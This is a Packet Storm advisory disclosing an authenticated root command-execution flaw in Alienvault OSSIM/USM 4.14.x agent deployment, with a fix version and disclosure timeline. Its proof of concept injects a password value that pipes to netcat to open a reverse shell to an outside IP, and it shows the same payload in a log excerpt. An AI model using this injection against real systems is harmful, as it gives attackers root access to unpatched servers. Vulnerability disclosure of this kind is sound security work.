what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Alienvault OSSIM/USM 4.14.X Command Execution

Alienvault OSSIM/USM 4.14.X Command Execution
Posted Jan 16, 2015
Authored by Peter Lapp

Alienvault OSSIM/USM versions 4.14.x and below suffer from a remote command execution vulnerability. Proof of concept included.

tags | exploit, remote, proof of concept
SHA-256 | a68baa3bbf3f63879d7b7f3eaa8c9b8bc017abc0c0112daba2b272eca6043950

Alienvault OSSIM/USM 4.14.X Command Execution

Change Mirror Download
Details
=======

Product: Alienvault OSSIM/USM
Vulnerability: Command Execution
Author: Peter Lapp, lappsec@gmail.com
CVE: None assigned
Vulnerable Versions: <=4.14.X
Fixed Version: 4.15.0


Summary
=======

Alienvault OSSIM is an open source SIEM solution designed to collect
and correlate log data. The automatic deployment option for OSSEC
agents is vulnerable to command execution as root. Authentication to
the web UI is required to exploit this vulnerability.



Technical Details and POC
=========================

The web UI allows a user to automatically deploy OSSEC agents to
Windows hosts when supplied with a username and password. The username
and password are passed unfiltered to a command that runs as root. By
simply providing a password of "fakepass | nc -c /bin/sh X.X.X.X 1234
| " a reverse shell is created and root access to the operating system
is obtained.

The user.log shows the input as it is passed to the command:

Dec 18 16:42:28 ossim-server ansible-command: Invoked with
executable=/bin/bash shell=True args= program_files_x86=$(winexe
--user=/test%fakepass | nc -c /bin/sh 10.10.10.10 1234 |
//10.10.10.199 'cmd /c set' | grep "^ProgramFiles(x86)=" | cut -d'='
-f 2-); program_files_x64=$(winexe --user=/test%fakepass | nc -c
/bin/sh 10.10.10.10 1234 | //10.10.10.199 'cmd /c set' | grep
"^ProgramFiles=" | cut -d'=' -f 2-); [[ $program_files_x86 ]] && echo
$program_files_x86 || echo $program_files_x64 removes=None
creates=None chdir=None



Solution
========

Upgrade to v4.15



References
==========

https://www.alienvault.com/forums/discussion/4414/alienvault-v4-15-functional-release
(ENG-98338)



Timeline
========
12/18/14 - Reported the vulnerability to the vendor and received
confirmation that a defect was filed.
01/14/15 - Vendor confirmed the issue was fixed and patch available.
01/15/15 - Confirmed vulnerability was no longer exploitable and released info.
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close